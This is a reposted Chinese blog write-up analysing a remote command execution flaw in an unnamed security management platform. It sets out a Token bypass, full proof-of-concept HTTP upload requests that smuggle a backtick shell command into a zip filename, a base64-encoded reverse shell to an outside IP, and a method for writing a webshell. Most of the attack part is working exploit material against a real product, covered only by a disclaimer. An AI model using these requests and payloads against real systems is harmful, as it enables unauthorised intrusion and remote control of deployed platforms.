某安防管理平台一次远程命令执行漏洞分析

admin
admin
admin
138876
文章
114
评论
2024年8月4日22:06:02评论55 views字数 2551阅读8分30秒阅读模式

某安防管理平台一次远程命令执行漏洞分析

文章来源:奇安信攻防社区

作者:zhizhuo

链接:https://forum.butian.net/share/3085

通过某些渠道拿到一些漏洞情报,直接打开idea完整的跟一下给他卷出来,简单的讲述一下整个分析的过程以及漏洞触发的流程

漏洞细节

通过情报直接获取到一点点细节,那就直接开始看过程

某安防管理平台一次远程命令执行漏洞分析

某安防管理平台一次远程命令执行漏洞分析

直接可以上传webshell,但是这里有一个Token鉴权

某安防管理平台一次远程命令执行漏洞分析

我们需要看这个Token的生成算法

某安防管理平台一次远程命令执行漏洞分析

对应的是so文件,需要我们ida逆向分析

某安防管理平台一次远程命令执行漏洞分析

直接看sub_35690函数即可,

某安防管理平台一次远程命令执行漏洞分析

这里主要看v8大于等于0的函数即可,这里我就懒得看了

复现

数据包

POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1
Host:
Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 566
Content-Type: multipart/form-data; boundary=------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

--------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx
Content-Disposition: form-data; name="file";filename="z.zip"
{{file(/Users/zhizhuo/Desktop/tools/目录穿越zip生成器/z.zip)}}
--------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx--

某安防管理平台一次远程命令执行漏洞分析

没打成功,回头在细梭一边代码,发现最终RCE的地方并不是文件上传,而是文件名字,先放一段要用的payload

"`ping xxx.dnslog.cn`.zip"  
# 反弹shell  
"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzkwOTkgMD4mMQ== | base64 -d"

文件名字不能有/这tm直接就不能写webshell,看起来只能无回显利用

某安防管理平台一次远程命令执行漏洞分析

某安防管理平台一次远程命令执行漏洞分析

某安防管理平台一次远程命令执行漏洞分析

最后构造的poc数据包

POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1  
Host:   
Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0=  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805  
Content-Length: 346  

-----------------------------142851345723692939351758052805  
Content-Disposition: form-data; name="file"; filename="`ping xxx.dnslog.cn`.zip"  
Content-Type: application/zip  

123  
-----------------------------142851345723692939351758052805--

Token生成

在@Y4tacker 的指导下完成了整个token获取后台变前台(二进制的算法被Y5割了2个月没给我)
某安防管理平台一次远程命令执行漏洞分析

对于除了/static/外的路径都会经过验证Token

某安防管理平台一次远程命令执行漏洞分析

如果传入的Token没有通过验证的话,那么就会生成一个新的Token返回,下面找到访问控制器就可以了

某安防管理平台一次远程命令执行漏洞分析

构造请求获取Token信息

某安防管理平台一次远程命令执行漏洞分析

Token到手,在配合前面的上传数据包就可以实现远程命令执行

EXP

前面有说到有/拦截不能写webshell,但是实际上是可以,在上面给到的payload中有一个反弹shell的操作,利用的正是linux的特性,所以直接通过base64的方式加上重定向追加写入就是可以写入webshell的

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

原文始发于微信公众号(黑白之道):某安防管理平台一次远程命令执行漏洞分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月4日22:06:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某安防管理平台一次远程命令执行漏洞分析https://cn-sec.com/archives/3032760.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息